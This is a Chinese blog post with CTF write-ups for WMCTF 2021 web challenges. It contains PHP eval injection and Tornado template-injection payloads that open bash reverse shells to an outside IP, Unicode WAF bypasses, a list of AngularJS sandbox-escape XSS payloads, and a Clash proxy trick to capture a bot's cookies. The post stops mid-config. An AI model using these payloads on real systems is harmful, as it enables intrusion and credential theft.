<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.getflag.cn","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="复现一下🙃">
<meta property="og:type" content="article">
<meta property="og:title" content="WMCTF 2021">
<meta property="og:url" content="https://www.getflag.cn/2021/09/08/WMCTF%202021/index.html">
<meta property="og:site_name" content="kawhi&#39;s Blog">
<meta property="og:description" content="复现一下🙃">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210906211610556.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210906211623115.png">
<meta property="article:published_time" content="2021-09-07T16:00:00.000Z">
<meta property="article:modified_time" content="2021-09-08T00:47:03.286Z">
<meta property="article:author" content="kawhi">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20210906211610556.png">

<link rel="canonical" href="https://www.getflag.cn/2021/09/08/WMCTF%202021/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>WMCTF 2021 | kawhi's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">kawhi's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">今天也没什么干劲</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fab fa-pagelines fa-fw"></i>友链</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://www.getflag.cn/2021/09/08/WMCTF%202021/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="http://yuhaojiang.gitee.io/picture/Blog头像.jpg">
      <meta itemprop="name" content="kawhi">
      <meta itemprop="description" content="随笔、分享、记录生活">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="kawhi's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          WMCTF 2021
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-09-08 00:00:00 / 修改时间：08:47:03" itemprop="dateCreated datePublished" datetime="2021-09-08T00:00:00+08:00">2021-09-08</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF%E6%AF%94%E8%B5%9B/" itemprop="url" rel="index"><span itemprop="name">CTF比赛</span></a>
                </span>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>9.9k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>9 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>复现一下🙃<a id="more"></a></p>
<h1 id="ez-piwigo"><a href="#ez-piwigo" class="headerlink" title="ez piwigo"></a>ez piwigo</h1><p><code>admin</code>弱口令直接进入后台，看到<code>LocalFiles Editor</code>插件里看到<code>admin.php</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;github.com&#x2F;Piwigo&#x2F;LocalFilesEditor&#x2F;blob&#x2F;96ddd392a14ae2caef3416b379c0868610d2d15f&#x2F;admin.php#L81</span><br></pre></td></tr></table></figure>

<p>此处的<code>eval_syntax</code>函数的参数可控，跟进<code>eval_syntax()</code>方法，发现<code>$code</code>参数会拼接到<code>eval</code>函数里面</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$eval &#x3D; eval(&#39;if(0)&#123;&#39; . $code . &#39;&#125;&#39;);</span><br></pre></td></tr></table></figure>

<p>可以闭合原语句来注入<code>PHP</code>语句，<code>payload</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">&#125;;system(<span class="string">&#x27;bash -c &quot;bash -i &gt;&amp; /dev/tcp/ip 0&gt;&amp;1&quot;&#x27;</span>);<span class="keyword">if</span>(<span class="number">0</span>)&#123;</span><br></pre></td></tr></table></figure>

<h1 id="Number"><a href="#Number" class="headerlink" title="Number"></a>Number</h1><h2 id="官方解法"><a href="#官方解法" class="headerlink" title="官方解法"></a>官方解法</h2><p>首先本题<code>F12</code>进入<code>/view</code>之后可以看到模板</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;% if test &#x3D;&#x3D; lucky_number %&#125;</span><br><span class="line">	&lt;div class&#x3D;&quot;center&quot;&gt;You&#39;re so lucky&lt;&#x2F;div&gt;</span><br><span class="line">&#123;% else %&#125;</span><br><span class="line">	&lt;div class&#x3D;&quot;center&quot;&gt;You&#39;re not lucky enough&lt;&#x2F;div&gt;</span><br><span class="line">&#123;% end %&#125;</span><br></pre></td></tr></table></figure>

<p>会将我们输入的值直接加载进模板，然后和<code>lucky_number</code>比较</p>
<p>这里<code>tornado</code>解析模板是直接拼接的代码</p>
<p>这里可以构造类似<code>a1=str(bytearray([xx]))[-3:-2]</code>依次构造字符串</p>
<p>最后构造<code>eval(a1+a2+a3)</code>执行代码，生成脚本如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">&#x27;__import__(&quot;os&quot;).system(&quot;bash -c \&#x27;exec bash -i &amp;&gt;/dev/tcp/134.175.168.213/1234 &lt;&amp;1\&#x27;&quot;)&#x27;</span>;</span><br><span class="line">$result = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">$eval = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;strlen($a);$i++)</span><br><span class="line">&#123;</span><br><span class="line">	$result .= <span class="string">&#x27;a&#x27;</span>.$i.<span class="string">&#x27;=str(bytearray([0x&#x27;</span>.bin2hex($a[$i]).<span class="string">&#x27;]))[-3:-2]&#x27;</span>.PHP_EOL;</span><br><span class="line">	$eval = $eval.<span class="string">&#x27;a&#x27;</span>.$i.<span class="string">&#x27;+&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> substr($result,<span class="number">0</span>,<span class="number">-1</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;eval(&#x27;</span>.substr($eval,<span class="number">0</span>,<span class="number">-1</span>).<span class="string">&#x27;)&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="Nu1L战队解法"><a href="#Nu1L战队解法" class="headerlink" title="Nu1L战队解法"></a><code>Nu1L</code>战队解法</h2><p>直接用<code>unicode normalize</code>，导致 <code>exec</code> 可以执行 <code>unicode</code> 代码</p>
<p>可以利用特殊的字符绕过<code>waf</code>如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ᵉˣᵉᶜ</span><br><span class="line">𝑒𝑥𝑒𝑐</span><br></pre></td></tr></table></figure>

<p>生成脚本如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">&#x27;import os;os.system(&quot;bash -c \&#x27;exec bash -i &amp;&gt;/dev/tcp/134.175.168.213/1234 &lt;&amp;1\&#x27;&quot;)&#x27;</span>;</span><br><span class="line">$result = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;strlen($a);$i++)</span><br><span class="line">&#123;</span><br><span class="line">	$result .= <span class="string">&#x27;bytes([&#x27;</span>.ord($a[$i]).<span class="string">&#x27;])+&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> substr($result,<span class="number">0</span>,<span class="number">-1</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>看了队里<code>r2</code>师傅的脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> unicodedata</span><br><span class="line">function=<span class="string">&quot;exec&quot;</span></span><br><span class="line">args=<span class="string">&#x27;import os;os.system(&quot;calc&quot;)&#x27;</span></span><br><span class="line">payload=<span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> ch <span class="keyword">in</span> function:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">65535</span>):</span><br><span class="line">        <span class="keyword">if</span> ch!=chr(i) <span class="keyword">and</span> unicodedata.normalize(<span class="string">&quot;NFKC&quot;</span>,chr(i))==ch:</span><br><span class="line">            payload+=chr(i)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">payload+=<span class="string">&quot;(&quot;</span></span><br><span class="line"><span class="keyword">for</span> ch <span class="keyword">in</span> args:</span><br><span class="line">    payload+=<span class="string">&quot;bytes([%d])+&quot;</span>%(ord(ch))</span><br><span class="line">payload=payload[:len(payload)<span class="number">-1</span>]</span><br><span class="line">payload+=<span class="string">&quot;)&quot;</span></span><br><span class="line">print(payload)</span><br><span class="line">eval(payload)</span><br></pre></td></tr></table></figure>

<h1 id="granddad’s-guestbook"><a href="#granddad’s-guestbook" class="headerlink" title="granddad’s guestbook"></a>granddad’s guestbook</h1><p>本题所欠缺的知识：</p>
<p><code>AngularJS</code>是一个著名的基于<code>JavaScript</code>的开源<code>Web</code>框架，用于前端编程</p>
<p><code>Angular&lt;1.6</code>内的典型<code>XSS payload</code>如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; 7 * 7 &#125;&#125;</span><br></pre></td></tr></table></figure>

<p>如果<code>payload</code>成功执行，结果<code>49</code>将会出现</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;utf-8&quot;</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;https://cdn.bootcss.com/angular.js/1.1.5/angular.min.js&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">div</span> <span class="attr">ng-app</span>&gt;</span>&#123;&#123; 7 * 7 &#125;&#125;<span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>下面是一些 <code>AngularJS</code> 绕过的 <code>Payload</code>：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//1.0.1 - 1.1.5</span></span><br><span class="line">&#123;&#123;constructor.constructor(<span class="string">&#x27;alert(1)&#x27;</span>)()&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//1.2.0 - 1.2.1</span></span><br><span class="line">&#123;&#123;a=<span class="string">&#x27;constructor&#x27;</span>;b=&#123;&#125;;a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,<span class="number">0</span>,<span class="string">&#x27;alert(1)&#x27;</span>)()&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//1.2.2 - 1.2.5</span></span><br><span class="line">&#123;&#123;<span class="string">&#x27;a&#x27;</span>[&#123;<span class="attr">toString</span>:[].join,<span class="attr">length</span>:<span class="number">1</span>,<span class="number">0</span>:<span class="string">&#x27;__proto__&#x27;</span>&#125;].charAt=<span class="string">&#x27;&#x27;</span>.valueOf;$eval(<span class="string">&quot;x=&#x27;&quot;</span>+(y=<span class="string">&#x27;if(!window\\u002ex)alert(window\\u002ex=1)&#x27;</span>)+<span class="built_in">eval</span>(y)+<span class="string">&quot;&#x27;&quot;</span>);&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//1.2.6 - 1.2.18</span></span><br><span class="line">&#123;&#123;(_=<span class="string">&#x27;&#x27;</span>.sub).call.call(&#123;&#125;[$=<span class="string">&#x27;constructor&#x27;</span>].getOwnPropertyDescriptor(_.__proto__,$).value,<span class="number">0</span>,<span class="string">&#x27;alert(1)&#x27;</span>)()&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//1.2.19 - 1.2.23</span></span><br><span class="line">&#123;&#123;toString.constructor.prototype.toString=toString.constructor.prototype.call;[<span class="string">&quot;a&quot;</span>,<span class="string">&quot;alert(1)&quot;</span>].sort(toString.constructor);&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//1.2.24 - 1.2.29</span></span><br><span class="line">&#123;&#123;<span class="string">&#x27;a&#x27;</span>.constructor.prototype.charAt=<span class="string">&#x27;&#x27;</span>.valueOf;$eval(<span class="string">&quot;x=&#x27;\&quot;+(y=&#x27;if(!window\\u002ex)alert(window\\u002ex=1)&#x27;)+eval(y)+\&quot;&#x27;&quot;</span>);&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//1.3.0</span></span><br><span class="line">&#123;&#123;!ready &amp;&amp; (ready = <span class="literal">true</span>) &amp;&amp; (</span><br><span class="line">!call</span><br><span class="line">? $$watchers[<span class="number">0</span>].get(toString.constructor.prototype)</span><br><span class="line">: (a = apply) &amp;&amp;</span><br><span class="line">(apply = <span class="keyword">constructor</span>) &amp;&amp;</span><br><span class="line">(valueOf = call) &amp;&amp;</span><br><span class="line">(&#x27;&#x27;+&#x27;&#x27;.toString(</span><br><span class="line">&#x27;F = Function.prototype;&#x27; +</span><br><span class="line">&#x27;F.apply = F.a;&#x27; +</span><br><span class="line">&#x27;delete F.a;&#x27; +</span><br><span class="line">&#x27;delete F.valueOf;&#x27; +</span><br><span class="line">&#x27;alert(1);&#x27;</span><br><span class="line">))</span><br><span class="line">);&#125;&#125;</span><br><span class="line"></span><br><span class="line">//1.3.1 - 1.3.2</span><br><span class="line">&#123;&#123;</span><br><span class="line">&#123;&#125;[&#123;<span class="attr">toString</span>:[].join,<span class="attr">length</span>:<span class="number">1</span>,<span class="number">0</span>:<span class="string">&#x27;__proto__&#x27;</span>&#125;].assign=[].join;</span><br><span class="line"><span class="string">&#x27;a&#x27;</span>.constructor.prototype.charAt=<span class="string">&#x27;&#x27;</span>.valueOf;</span><br><span class="line"> $eval(<span class="string">&#x27;x=alert(1)//&#x27;</span>);</span><br><span class="line">&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//1.3.3 - 1.3.18</span></span><br><span class="line">&#123;&#123;&#123;&#125;[&#123;<span class="attr">toString</span>:[].join,<span class="attr">length</span>:<span class="number">1</span>,<span class="number">0</span>:<span class="string">&#x27;__proto__&#x27;</span>&#125;].assign=[].join;</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;a&#x27;</span>.constructor.prototype.charAt=[].join;</span><br><span class="line"> $eval(<span class="string">&#x27;x=alert(1)//&#x27;</span>); &#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//1.3.19</span></span><br><span class="line">&#123;&#123;</span><br><span class="line"><span class="string">&#x27;a&#x27;</span>[&#123;<span class="attr">toString</span>:<span class="literal">false</span>,<span class="attr">valueOf</span>:[].join,<span class="attr">length</span>:<span class="number">1</span>,<span class="number">0</span>:<span class="string">&#x27;__proto__&#x27;</span>&#125;].charAt=[].join;</span><br><span class="line"> $eval(<span class="string">&#x27;x=alert(1)//&#x27;</span>);</span><br><span class="line">&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//1.3.20</span></span><br><span class="line">&#123;&#123;<span class="string">&#x27;a&#x27;</span>.constructor.prototype.charAt=[].join;$eval(<span class="string">&#x27;x=alert(1)&#x27;</span>);&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//1.4.0 - 1.4.9</span></span><br><span class="line">&#123;&#123;<span class="string">&#x27;a&#x27;</span>.constructor.prototype.charAt=[].join;$eval(<span class="string">&#x27;x=1&#125; &#125; &#125;;alert(1)//&#x27;</span>);&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//1.5.0 - 1.5.8</span></span><br><span class="line">&#123;&#123;x = &#123;<span class="string">&#x27;y&#x27;</span>:<span class="string">&#x27;&#x27;</span>.constructor.prototype&#125;; x[<span class="string">&#x27;y&#x27;</span>].charAt=[].join;$eval(<span class="string">&#x27;x=alert(1)&#x27;</span>);&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;a=toString().constructor.prototype;a.charAt=a.trim;$eval(<span class="string">&#x27;a,alert(42),a&#x27;</span>)&#125;&#125;<span class="string">&#x27;);&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">//1.5.9 - 1.5.11</span></span><br><span class="line"><span class="string">&#123;&#123;</span></span><br><span class="line"><span class="string"> c=&#x27;</span><span class="string">&#x27;.sub.call;b=&#x27;</span><span class="string">&#x27;.sub.bind;a=&#x27;</span><span class="string">&#x27;.sub.apply;</span></span><br><span class="line"><span class="string"> c.$apply=$apply;c.$eval=b;op=$root.$$phase;</span></span><br><span class="line"><span class="string"> $root.$$phase=null;od=$root.$digest;$root.$digest=(&#123;&#125;).toString;</span></span><br><span class="line"><span class="string"> C=c.$apply(c);$root.$$phase=op;$root.$digest=od;</span></span><br><span class="line"><span class="string"> B=C(b,c,b);$evalAsync(&quot;</span></span><br><span class="line"><span class="string"> astNode=pop();astNode.type=&#x27;</span>UnaryExpression<span class="string">&#x27;;</span></span><br><span class="line"><span class="string"> astNode.operator=&#x27;</span>(<span class="built_in">window</span>.X?void0:(<span class="built_in">window</span>.X=<span class="literal">true</span>,alert(<span class="number">1</span>)))+<span class="string">&#x27;;</span></span><br><span class="line"><span class="string"> astNode.argument=&#123;type:&#x27;</span>Identifier<span class="string">&#x27;,name:&#x27;</span>foo<span class="string">&#x27;&#125;;</span></span><br><span class="line"><span class="string">&quot;);</span></span><br><span class="line"><span class="string"> m1=B($$asyncQueue.pop().expression,null,$root);</span></span><br><span class="line"><span class="string"> m2=B(C,null,m1);[].push.apply=m2;a=&#x27;</span><span class="string">&#x27;.sub;</span></span><br><span class="line"><span class="string"> $eval(&#x27;</span>a(b.c)<span class="string">&#x27;);[].push.apply=a;</span></span><br><span class="line"><span class="string">&#125;&#125;</span></span><br></pre></td></tr></table></figure>

<p>更加详细的可参考：<code>https://xz.aliyun.com/t/4638</code></p>
<p>本题在报告<code>Report</code>处可以提交<code>url</code>，我们可以通过提交⼀个平台<code>XSS</code>来实现对管理员的信息进行读取，发现在前端源码中引入了<code>angular.js</code>，并且<code>ng-app</code>是开启状态，因此就去找<code>angular.js</code>的<code>csti</code>的相关信息</p>
<p>然而本题的<code>angular.js</code>是<code>1.8.8</code>版本的，默认<code>1.6</code>以后<code>angular</code>项目组就关闭了沙盒，所以沙盒不用绕过，直接用<code>payload</code>打即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;constructor.constructor(&#39;alert(1)&#39;)()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>到这里就可以成功触发<code>xss</code></p>
<h1 id="scientific-adfree-networking"><a href="#scientific-adfree-networking" class="headerlink" title="scientific_adfree_networking"></a>scientific_adfree_networking</h1><p>这题主要看残灯师傅的解题过程，题目的总体思路</p>
<ol>
<li>在<code>report</code>的时候让<code>bot</code>访问我们<code>vps</code>的<code>html</code>文件</li>
<li>其中的<code>/logout?next=</code>实现任意跳转访问我们<code>vps</code>的<code>html</code>文件可以触发<code>js</code>代码</li>
<li><code>js</code>代码中写好<code>clash</code>代理的配置可以通过<code>external-controller</code>控制<code>api</code>来走自己的代理获取<code>cookie</code></li>
</ol>
<h2 id="clash代理"><a href="#clash代理" class="headerlink" title="clash代理"></a>clash代理</h2><p>题目中的浏览器使用的是<code>clash</code>代理，我们可以修改<code>clash</code>配置中的<code>external-controller</code>选项来指定<code>api</code>的位置，题目中的<code>api</code>的位置在<code>127.0.0.1:9090</code></p>
<p>总体的思路就是是修改<code>clash</code>的配置，让浏览器走我们的代理，然后再次访问<code>blog.tomswebsite.com:8888</code>，这样的话我们就能抓到<code>bot</code>登陆<code>blog.tomswebsite.com:8888</code> 的<code>cookie</code></p>
<p>这里修改的<code>clash</code>配置为</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">mixed-port: <span class="number">1080</span></span><br><span class="line">allow-lan: <span class="literal">false</span></span><br><span class="line">mode: Rule</span><br><span class="line">log-level: debug</span><br><span class="line">external-controller: <span class="string">&#x27;127.0.0.1:9090&#x27;</span></span><br><span class="line"></span><br><span class="line">proxies:</span><br><span class="line">  - name: <span class="string">&#x27;http&#x27;</span></span><br><span class="line">    type: http</span><br><span class="line">    server: <span class="number">159.75</span><span class="number">.23</span><span class="number">.54</span></span><br><span class="line">    port: <span class="number">20002</span></span><br><span class="line"></span><br><span class="line">proxy-groups:</span><br><span class="line">  - name: <span class="string">&#x27;jrxnm&#x27;</span></span><br><span class="line">    type: select</span><br><span class="line">    proxies:</span><br><span class="line">      - http</span><br><span class="line"></span><br><span class="line">rules:</span><br><span class="line"> - 